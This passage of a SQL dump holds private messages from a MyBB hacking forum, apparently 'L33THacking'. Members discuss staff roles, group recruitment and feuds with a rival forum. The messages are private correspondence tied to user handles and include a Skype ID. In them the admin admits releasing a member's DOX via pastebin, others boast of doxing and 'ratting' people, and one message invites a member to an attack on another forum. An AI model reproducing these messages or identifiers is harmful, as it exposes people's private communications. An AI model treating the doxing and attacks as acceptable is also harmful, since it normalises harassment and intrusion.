anyway.\r\n\r\nDo you know who spencer weeks is?\r\n[/quote]\r\n\r\nYeah lol, Sorry about him. We were drinking that night and he saw you guys from when I liked the page and he was like\r\n\r\n\"I wonder if they can hack my phone n stuff\" and try\'d to make you mad.. but I told him after I said, \"Mate i\'m staff on that website what are you doing\" and he was like oh shit lol..\r\n\r\nyeah sorry.', '1349570184', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2541', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: me', '0', 'Don\'t take any offense he\'s just a troll', '1349570369', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2544', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: me', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\nDon\'t take any offense he\'s just a troll\r\n[/quote]\r\n\r\nAlright and sorry for posting your name on LH.\r\n[/quote]\r\n\r\nNo problem, I told him to stop anyways.', '1349570470', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2547', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: me', '0', 'Working on some homeowork, than going out. All my friends are home from college since it\'s canadian thanksgiving this weekend. ', '1349570785', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2668', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Unique', '0', '[quote=\'t3h jok3r\']\r\nI was wondering are you interested in becoming the new leader of the Unique group?\r\n[/quote]\r\n\r\nI will be to become the new leader of Unique.', '1349685111', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2670', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Unique', '0', '[quote=\'t3h jok3r\']\r\nI was wondering are you interested in becoming the new leader of the Unique group?\r\n[/quote]\r\n\r\nI will be happy*\r\ndamn phone', '1349685160', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2673', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Unique', '0', '[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\nI was wondering are you interested in becoming the new leader of the Unique group?\r\n[/quote]\r\n\r\nI will be to become the new leader of Unique.\r\n[/quote]\r\n\r\nLol I will make you the leader when I get back home', '1349719354', '0', '3', '1349863210', '1', '0', '0', '1349724108'); INSERT INTO mybb_privatemessages VALUES('3010', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH.\r\n[/quote]\r\n\r\nOffshore or onshore? \r\n[/quote]\r\nDoesnt matter, it might or might not contain hacking.\r\n[/quote]\r\n\r\nFor onshore I could a cheap hosting but domain depends. \r\n[/quote]\r\nOh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also.\r\n[/quote]\r\n\r\nYeah I noticed.\r\n[/quote]\r\nAlso is apathy still going to be an admin?', '1350093559', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2681', '222', '222', '203', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'fearless group', '0', 'Hey, its me neon was wondering how do i join the new group fearless?\r\n\r\nhope to hear from you soon :)\r\n', '1349724989', '0', '3', '1349750270', '1', '0', '2', '1349750242'); INSERT INTO mybb_privatemessages VALUES('3007', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH.\r\n[/quote]\r\n\r\nOffshore or onshore? \r\n[/quote]\r\nDoesnt matter, it might or might not contain hacking.\r\n[/quote]\r\n\r\nFor onshore I could a cheap hosting but domain depends. \r\n[/quote]\r\nOh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also.', '1350093048', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2696', '240', '240', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"240\";}}', '1', 'Checking out LH?', '0', '1. Moderator at Anarchy forums.\r\n2. After \"stalking\" you on my board, I have noticed that you are going through my members profiles for the past 30 mins.\r\n3. I\'m requesting you nicely to either leave or stay on L33THacking and be HQ + Active.\r\n\r\nIf you spam, continue to view profiles, send messages violating our rules and regulations or DDoS LH then they will be consequences. Therefore, I\'m sending this PM to warn you and once again either leave LH or stay here and be HQ + Active. ', '1349727702', '0', '3', '1349728582', '1', '0', '0', '1349728347'); INSERT INTO mybb_privatemessages VALUES('2697', '62', '62', '203', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'i need you PLZ', '0', 'i was wondering if u could make me a userbard similar to this one:\r\n[img]http://imageshack.us/a/img802/7561/ratters.gif[/img]\r\nbut make the ratters green,red,yellow\r\n:D\r\nif its prossible plz i really need this for my group to work out il give u a spot if u want :)\r\n\r\nplz reply soon', '1349727903', '0', '3', '1349728080', '1', '0', '2', '1349727980'); INSERT INTO mybb_privatemessages VALUES('3004', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Yo', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH.\r\n[/quote]\r\n\r\nOffshore or onshore? \r\n[/quote]\r\nDoesnt matter, it might or might not contain hacking.\r\n[/quote]\r\n\r\nFor onshore I could a cheap hosting but domain depends. ', '1350092947', '0', '3', '1350093048', '1', '0', '0', '1350092987'); INSERT INTO mybb_privatemessages VALUES('2702', '62', '203', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: i need you PLZ', '0', '[quote=\'NeonLights\']\r\ni was wondering if u could make me a userbard similar to this one:\r\n[img]http://imageshack.us/a/img802/7561/ratters.gif[/img]\r\nbut make the ratters green,red,yellow\r\n:D\r\nif its prossible plz i really need this for my group to work out il give u a spot if u want :)\r\n\r\nplz reply soon\r\n[/quote]\r\n\r\ni will do this bro. \r\nno worries.', '1349728015', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2703', '62', '62', '203', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: i need you PLZ', '0', '[quote=\'R?????zo?\']\r\n[quote=\'NeonLights\']\r\ni was wondering if u could make me a userbard similar to this one:\r\n[img]http://imageshack.us/a/img802/7561/ratters.gif[/img]\r\nbut make the ratters green,red,yellow\r\n:D\r\nif its prossible plz i really need this for my group to work out il give u a spot if u want :)\r\n\r\nplz reply soon\r\n[/quote]\r\n\r\ni will do this bro. \r\nno worries.\r\n[/quote]\r\n\r\nthank you so fucking much :)\r\nwhen will this be done? just wondering :D excited to see it', '1349728050', '0', '3', '1349730574', '1', '0', '2', '1349728215'); INSERT INTO mybb_privatemessages VALUES('3003', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH.\r\n[/quote]\r\n\r\nOffshore or onshore? \r\n[/quote]\r\nDoesnt matter, it might or might not contain hacking.', '1350092550', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2706', '62', '203', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: i need you PLZ', '0', '[quote=\'NeonLights\']\r\ni was wondering if u could make me a userbard similar to this one:\r\n[img]http://imageshack.us/a/img802/7561/ratters.gif[/img]\r\nbut make the ratters green,red,yellow\r\n:D\r\nif its prossible plz i really need this for my group to work out il give u a spot if u want :)\r\n\r\nplz reply soon\r\n[/quote]\r\nyou need this quick, im abit busy with my gf atm.', '1349728080', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2717', '240', '240', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"240\";}}', '1', 'Re: Checking out LH?', '0', '[quote=\'Hardz\']\r\n[quote=\'t3h jok3r\']\r\n1. Moderator at Anarchy forums.\r\n2. After \"stalking\" you on my board, I have noticed that you are going through my members profiles for the past 30 mins.\r\n3. I\'m requesting you nicely to either leave or stay on L33THacking and be HQ + Active.\r\n\r\nIf you spam, continue to view profiles, send messages violating our rules and regulations or DDoS LH then they will be consequences. Therefore, I\'m sending this PM to warn you and once again either leave LH or stay here and be HQ + Active. \r\n[/quote]\r\n\r\nHello t3h jok3r,\r\n\r\nLet\'s not bring AnarchyForums Moderator Status into this conversation - it\'s not needed. You may think it \'sucks\', but that\'s your opinion.\r\n\r\nI\'ve been browsing through your site just observing if it was a place for me to stay - it looks quite good.\r\n\r\nI\'m not spamming (haven\'t made a single post), I\'m not sure what\'s wrong with viewing profiles & I am in no way sending any messages violating your rules. And I can assure you no one on AF was ddosing your site - that was nothing to do with us.\r\n[/quote]\r\n\r\nSure, if you would like to keep Anarchy forums out of this conversation then I sure will. The thing is I\'m sure you are aware of what happened between L33THacking and Anarchy and you are right there\'s nothing wrong in observing but you keep on constantly viewing the same profiles and the \"I\'m BreShie\" thread. It\'s just that I can\'t let my members personal information get compromised such as our member iTzIpods information got exposed by Anarchy Forums owner.', '1349728902', '0', '3', '1349729191', '1', '0', '0', '1349728920'); INSERT INTO mybb_privatemessages VALUES('2998', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Yo', '0', 'Yo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH.', '1350091099', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2999', '222', '222', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: Suggestion....', '0', '[quote=\'ƒ???????????g\']\r\nYo in the general sectio it says updates, suggestions and announcements. Make that Updates and Announcements and only allow staff to post there. People are posting random shit in the announcements. Only important shot shod go there. Have people post I the general section if they want to discuss something :)\r\n[/quote]\r\n\r\nThanks but then we would need another section for bugs etc so I want to keep that section for staff announcements and bugs. ', '1350092210', '0', '1', '0', '1', '0', '0', '1350099517'); INSERT INTO mybb_privatemessages VALUES('2720', '62', '214', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"214\";}}', '2', 'Unique', '0', 'you have negative rep, so I will decline your request.', '1349729061', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2724', '240', '1', '240', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Checking out LH?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Hardz\']\r\n[quote=\'t3h jok3r\']\r\n1. Moderator at Anarchy forums.\r\n2. After \"stalking\" you on my board, I have noticed that you are going through my members profiles for the past 30 mins.\r\n3. I\'m requesting you nicely to either leave or stay on L33THacking and be HQ + Active.\r\n\r\nIf you spam, continue to view profiles, send messages violating our rules and regulations or DDoS LH then they will be consequences. Therefore, I\'m sending this PM to warn you and once again either leave LH or stay here and be HQ + Active. \r\n[/quote]\r\n\r\nHello t3h jok3r,\r\n\r\nLet\'s not bring AnarchyForums Moderator Status into this conversation - it\'s not needed. You may think it \'sucks\', but that\'s your opinion.\r\n\r\nI\'ve been browsing through your site just observing if it was a place for me to stay - it looks quite good.\r\n\r\nI\'m not spamming (haven\'t made a single post), I\'m not sure what\'s wrong with viewing profiles & I am in no way sending any messages violating your rules. And I can assure you no one on AF was ddosing your site - that was nothing to do with us.\r\n[/quote]\r\n\r\nSure, if you would like to keep Anarchy forums out of this conversation then I sure will. The thing is I\'m sure you are aware of what happened between L33THacking and Anarchy and you are right there\'s nothing wrong in observing but you keep on constantly viewing the same profiles and the \"I\'m BreShie\" thread. It\'s just that I can\'t let my members personal information get compromised such as our member iTzIpods information got exposed by Anarchy Forums owner.\r\n[/quote]\r\n\r\nI was just interesting in seeing why BreShie left and suddenly became so determined to \'screw\' AF\'. \r\n\r\nAnarchist is a good guy - despite what you may think. He wouldn\'t reveal iTzTpods information because it is nothing to do with him and it wouldn\'t be even remotely fair.', '1349729191', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2725', '62', '62', '214', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Unique', '0', '[quote=\'R?????zo?\']\r\nyou have negative rep, so I will decline your request.\r\n[/quote]\r\n\r\nNo I do not have negative rep?', '1349729357', '0', '3', '1349730684', '1', '0', '0', '1349730583'); INSERT INTO mybb_privatemessages VALUES('2726', '214', '62', '214', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: Unique', '0', '[quote=\'R?????zo?\']\r\nyou have negative rep, so I will decline your request.\r\n[/quote]\r\n\r\nNo I do not have negative rep?', '1349729357', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2729', '62', '62', '203', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'the userbar', '0', 'well anyways do it whenever u got time :S\r\n', '1349729859', '0', '1', '0', '1', '0', '2', '1349730577'); INSERT INTO mybb_privatemessages VALUES('2731', '67', '67', '232', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '1', 'LH Coders', '0', 'I understand you were the old leader, but because of your inactivity I\'ve now taken over, you didn\'t even have a thread started. I\'d kindly ask you to apply in the thread.\r\n\r\nhttp://l33thacking.net/thread-762.html', '1349730391', '0', '1', '0', '1', '0', '0', '1349866607'); INSERT INTO mybb_privatemessages VALUES('2993', '2', '2', '224', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: Site', '0', '[quote=\'Apathy\']\r\n[quote=\'monkey\']\r\nHow much would it cost to buy the site DB so I can merge it with my site and to get it to redirect to my site? Serious question.\r\n[/quote]\r\nI have no idea sorry.\r\n[/quote]\r\n\r\nHow\'s $10?', '1350079108', '0', '3', '1350093033', '0', '0', '0', '1350093004'); INSERT INTO mybb_privatemessages VALUES('2996', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Suggestion....', '0', 'Yo in the general sectio it says updates, suggestions and announcements. Make that Updates and Announcements and only allow staff to post there. People are posting random shit in the announcements. Only important shot shod go there. Have people post I the general section if they want to discuss something :)', '1350081037', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2737', '62', '203', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: i need you PLZ', '0', 'something like this bro?\r\n\r\nhttp://imageshack.us/a/img38/7561/ratters.gif', '1349730574', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2739', '62', '214', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"214\";}}', '2', 'Re: Unique', '0', '[quote=\'Rave™\']\r\n[quote=\'R?????zo?\']\r\nyou have negative rep, so I will decline your request.\r\n[/quote]\r\n\r\nNo I do not have negative rep?\r\n[/quote]\r\n\r\nyou had before, also our last talk on skype was not that famous.', '1349730684', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2740', '62', '62', '203', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: i need you PLZ', '0', '[quote=\'R?????zo?\']\r\nsomething like this bro?\r\n\r\nhttp://imageshack.us/a/img38/7561/ratters.gif\r\n[/quote]\r\nholy fuck ur the best thx so mutch', '1349730709', '0', '1', '0', '1', '0', '2', '1349732247'); INSERT INTO mybb_privatemessages VALUES('2744', '240', '240', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"240\";}}', '1', 'Re: Checking out LH?', '0', '[quote=\'Hardz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Hardz\']\r\n[quote=\'t3h jok3r\']\r\n1. Moderator at Anarchy forums.\r\n2. After \"stalking\" you on my board, I have noticed that you are going through my members profiles for the past 30 mins.\r\n3. I\'m requesting you nicely to either leave or stay on L33THacking and be HQ + Active.\r\n\r\nIf you spam, continue to view profiles, send messages violating our rules and regulations or DDoS LH then they will be consequences. Therefore, I\'m sending this PM to warn you and once again either leave LH or stay here and be HQ + Active. \r\n[/quote]\r\n\r\nHello t3h jok3r,\r\n\r\nLet\'s not bring AnarchyForums Moderator Status into this conversation - it\'s not needed. You may think it \'sucks\', but that\'s your opinion.\r\n\r\nI\'ve been browsing through your site just observing if it was a place for me to stay - it looks quite good.\r\n\r\nI\'m not spamming (haven\'t made a single post), I\'m not sure what\'s wrong with viewing profiles & I am in no way sending any messages violating your rules. And I can assure you no one on AF was ddosing your site - that was nothing to do with us.\r\n[/quote]\r\n\r\nSure, if you would like to keep Anarchy forums out of this conversation then I sure will. The thing is I\'m sure you are aware of what happened between L33THacking and Anarchy and you are right there\'s nothing wrong in observing but you keep on constantly viewing the same profiles and the \"I\'m BreShie\" thread. It\'s just that I can\'t let my members personal information get compromised such as our member iTzIpods information got exposed by Anarchy Forums owner.\r\n[/quote]\r\n\r\nI was just interesting in seeing why BreShie left and suddenly became so determined to \'screw\' AF\'. \r\n\r\nAnarchist is a good guy - despite what you may think. He wouldn\'t reveal iTzTpods information because it is nothing to do with him and it wouldn\'t be even remotely fair.\r\n[/quote]\r\n\r\nHonestly you know Anarchist more than I do. If he really was a good guy then he wouldn\'t create fake accounts and spam. I can prove the threads he created by spamming and he sent every single member of my forum a PM advertising his site. iTzIpods information is online, feel free to check out pastebin and Anarchist posted it online. Yesterday when I was chatting with iTzIpod, I told him that Anarchist has his DOX but never told him that it\'s already online because I didn\'t want him to get worried.\r\n\r\nI also agree to the fact why BreShie would all of a sudden turn his back on Anarchy forums. I\'m pretty surprised too and I think something\'s being planned. However, BreShie is good guy and I have seen him around on SF.', '1349730831', '0', '1', '0', '1', '0', '0', '1349732250'); INSERT INTO mybb_privatemessages VALUES('3770', '222', '222', '5', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: Pro Doxer- NSA', '0', '[quote=\'Exposé\']\r\n[quote=\'Timmy\']\r\n[quote=\'Exposé\']\r\n[quote=\'Timmy\']\r\nhttp://pastebin.com/eXVxALWX\r\n[/quote]\r\n\r\nLmao...who is this...and yeh if you got this ur good :D\r\n[/quote]\r\n\r\nxhostfire.com hosting owner.\r\n\r\nI didn\'t DOX him, Jok3r did because jok3r was banned from one of their servers for running a site with phishing discussions.\r\n[/quote]\r\n\r\nWell a hosting company isnt that hard to dox since they use real information....lmao. But do you dox at all?\r\n[/quote]\r\n\r\nUse to. I thought jok3r could help you because he once DOXed and RATTED a microsoft agent.\r\n\r\nThe owner of xhostfire company is a hacker who has been arrested twice for brutal fights, he is a wanted hacker that was never caught for hacking so doxing such a guy is a mission.', '1351044684', '0', '1', '0', '1', '0', '0', '1351044759'); INSERT INTO mybb_privatemessages VALUES('2990', '62', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Joining Ratters', '0', 'Heyo, sorry about that, I hadn\'t made the recruitment thread for Ratters yet. You can join because I know you\'re HQ so enjoy the group :) If you wanna help me make the recruitment thread that would be awesome because I don\'t have a huge amount of time right now heres what I have so far-\r\n\r\n[align=center][size=medium][color=#E6E6FA]\r\n\r\nHello everybody, GRONgamer here. This is the Official recruitment thread for Ratters. This group is for any member that enjoys using Remote Administration Tools or teaching others how to use them. Therefor I will take any member into consideration, as long as you meet the small requirements I\'ve listed below.\r\n\r\n\r\n1.) Must have at LEAST 30+ posts.\r\n\r\n2.) Must have at least \r\n\r\n[/color][/size][/align]\r\n\r\n\r\n', '1350054482', '0', '1', '0', '1', '0', '2', '1350068174'); INSERT INTO mybb_privatemessages VALUES('2991', '100', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Joining Ratters', '0', 'Heyo, sorry about that, I hadn\'t made the recruitment thread for Ratters yet. You can join because I know you\'re HQ so enjoy the group :) If you wanna help me make the recruitment thread that would be awesome because I don\'t have a huge amount of time right now heres what I have so far-\r\n\r\n[align=center][size=medium][color=#E6E6FA]\r\n\r\nHello everybody, GRONgamer here. This is the Official recruitment thread for Ratters. This group is for any member that enjoys using Remote Administration Tools or teaching others how to use them. Therefor I will take any member into consideration, as long as you meet the small requirements I\'ve listed below.\r\n\r\n\r\n1.) Must have at LEAST 30+ posts.\r\n\r\n2.) Must have at least \r\n\r\n[/color][/size][/align]\r\n\r\n\r\n', '1350054482', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2987', '2', '224', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"224\";}}', '2', 'Re: Site', '0', '[quote=\'monkey\']\r\nHow much would it cost to buy the site DB so I can merge it with my site and to get it to redirect to my site? Serious question.\r\n[/quote]\r\nI have no idea sorry.', '1350037594', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2979', '228', '228', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Thread', '0', '[quote=\'VirtualLegend\']\r\nCheck my new Thread: http://l33thacking.net/thread-807.html\r\n[/quote]\r\n\r\nCheers mate, I shall check It out.\r\n\r\nThanks :)', '1350015133', '0', '1', '0', '1', '0', '2', '1350025545'); INSERT INTO mybb_privatemessages VALUES('2980', '205', '228', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Thread', '0', '[quote=\'VirtualLegend\']\r\nCheck my new Thread: http://l33thacking.net/thread-807.html\r\n[/quote]\r\n\r\nCheers mate, I shall check It out.\r\n\r\nThanks :)', '1350015133', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2982', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'GIVEAWAY CONTEST', '0', 'Hi,\r\n\r\nI have a new Thread about a Huge GIVEAWAY. I want that everyone is involved in the Contest, so thats why I\'m asking you can you PM everyone to go to my contest i will be glad if you do it and you will receive the Huge Ultimate Pack too.\r\n\r\nThread: http://l33thacking.net/thread-822.html\r\n\r\nBye,', '1350030248', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2985', '62', '232', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"232\";}}', '2', 'Re: LH Coders - Your Project', '0', '[quote=\'BreShiE\']\r\nHey there, R?????zo?.\r\n\r\nIn order to keep the LHC free of people whom claim to code, but can\'t, each applicant is assigned a project which must be completed within 72 hours. All projects are different to one another to keep it free flowing and not-easily copied amongst other members. You may code the project in any language you choose.\r\n\r\n\r\nYou can:\r\n[list]\r\n[*]Use google to help you\r\n[*]Ask for help in the forums\r\n[*]Submit the project anytime, as long as it\'s within the 72 hours\r\n[/list]\r\n\r\nYou cannot:\r\n[list]\r\n[*]Copy and Paste\r\n[*]Get others to complete the project for you\r\n[*]Submit a project after the 72 hours\r\n[/list]\r\n\r\nYou must:\r\n[list]\r\n[*]Use correct indentation\r\n[*]Comment out code\r\n[*]Complete to the best of your ability\r\n[*]Release your project into the correct section in a formal manner\r\n[/list]\r\n\r\n\r\n[b]Your project:[/b]\r\nYou\'re to create a program which will return the source code of a web page. This should then be able to be edited by the user, and have a preview of the code.\r\n[/quote]\r\n\r\nI will have to decline my apply since i\'m short on time now, busy with my job and girlfriend.\r\nSo I don\'t have the time for this, I might apply later when I got some free time. Thanks for understanding', '1350036195', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2755', '61', '61', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Dox', '0', 'I just got doxed by t3h jok3r, or The Anarchist... ', '1349733498', '0', '1', '0', '1', '0', '0', '1349733626'); INSERT INTO mybb_privatemessages VALUES('2762', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: I got doxed...', '0', '[quote=\'iTzIpod\']\r\nI heard you doxed me..\r\n\r\nhttp://pastebin.com/Sd9z60se\r\n\r\nI don\'t like what happened. Take it down.\r\n\r\n\r\nAF owner told me you done this.\r\n\r\nHow could he know that I am \"slim, possibly short, and wear glasses?\" None of my photos are online. And the only photo I showed that was online was the one I sent you for the Swag Award. Great...\r\n\r\nt3h jok3r, I sometimes wish I never even met you.. You don\'t know what I\'m experiencing in life right now. And it\'s getting worse each day... \r\n[/quote]\r\n\r\nI gave that DOX to someone on Skype the day I was pissed off. The DOX is posted with no account, all I can do is that I can create an account and report a take down. Actually I honestly think I never met you because I tried to help you every single time but guess what happened you fucked it up and blamed me. If you want faster take down then you can report the take down on Pastebin and since they will have your IP they won\'t need to investigate. ', '1349734796', '0', '3', '1349743934', '1', '0', '0', '1349734851'); INSERT INTO mybb_privatemessages VALUES('3031', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH.\r\n[/quote]\r\n\r\nOffshore or onshore? \r\n[/quote]\r\nDoesnt matter, it might or might not contain hacking.\r\n[/quote]\r\n\r\nFor onshore I could a cheap hosting but domain depends. \r\n[/quote]\r\nOh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also.\r\n[/quote]\r\n\r\nYeah I noticed.\r\n[/quote]\r\nAlso is apathy still going to be an admin?\r\n[/quote]\r\nGiving him another chance he said he was away because of the thanksgiving. \r\n[/quote]\r\nYou know thats a lie because he is on HF and in a Official group with me and he has been posting since I cam back.\r\n[/quote]\r\n\r\nCan I get a screenshot or something to back up myself while talking to him?\r\n[/quote]\r\nNevermind it was on 10-9-12 but if you want that screenshot then I could get it for you.\r\n[/quote]\r\n\r\nWhen was the last post?\r\n[/quote]\r\n\r\n10-09-2012, 09:12 PM (This post was last modified: 10-09-2012 09:12 PM by Apathy.\r\n[/quote]\r\n\r\nWell OK then ;)\r\n[/quote]\r\nDoes that help you?\r\n[/quote]\r\n\r\nNope, it basically backups his story which means that he was out of town. BTW do you know the user Monkey?\r\n[/quote]\r\nNope\r\n[/quote]\r\n\r\n\r\nok, I don\'t know why but I sleepy already. It\'s like 10 now and I normally sleep at 2.\r\n[/quote]\r\nOh damn', '1350095669', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2766', '228', '228', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Mod', '0', 'Before I make you mod, can you make one more post please? ', '1349734994', '0', '1', '0', '1', '0', '0', '1349874506'); INSERT INTO mybb_privatemessages VALUES('2771', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Yo', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nHey joker, are reg members able to neg rep?\r\n[/quote]\r\n\r\nDude I swear to god I was about to PM you. Anyway, I need a new Mod not the best I can do but are you interested?\r\n\r\nI don\'t think they can. \r\n[/quote]\r\nYes I am interested but I would prefer staff or admin but mod is okay for right now. Also since Itzipod or whatever his name is isnt mod or upgraded member could you remove his neg off of me?\r\n[/quote]\r\n\r\nDone and OK.\r\n[/quote]\r\nThanks man, and thats why I love you NO HOMO\r\n[/quote]\r\n\r\nLOL btw I\'m planning an attack on AF are you interestd? If not then it\'s cool np. ', '1349735236', '0', '3', '1349735362', '1', '0', '0', '1349735338'); INSERT INTO mybb_privatemessages VALUES('2796', '214', '203', '214', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Hey', '0', 'hey man my skype is \r\nSpushkin1', '1349744962', '0', 